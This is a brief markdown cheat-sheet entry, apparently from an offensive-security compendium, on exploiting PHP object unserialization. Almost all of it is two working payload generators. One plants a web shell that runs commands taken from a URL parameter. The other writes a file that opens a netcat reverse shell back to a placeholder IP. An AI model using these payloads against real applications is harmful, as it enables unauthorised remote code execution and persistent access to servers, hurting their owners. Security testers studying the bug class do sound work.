killchain-compendium/exploit/web/php/unserialize.md

# Unserialize

* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)

* Serialize via
```php
<?php
class FormSubmit {
    public $form_file = 'messages.php';
    public $message = '<?php
    if(isset($_GET[\'cmd\']))
    {
        system($_GET[\'cmd\']);
    }
?>';
}

print urlencode(serialize(new FormSubmit));
?>
```

```php
<?php class file 
    { 
        public $file = 'rev.php'; public $data = '<?php shell_exec("nc -e /bin/bash $TARGET_IP 4455"); ?>'; 
    } 
    echo (serialize(new file)); 
?>
```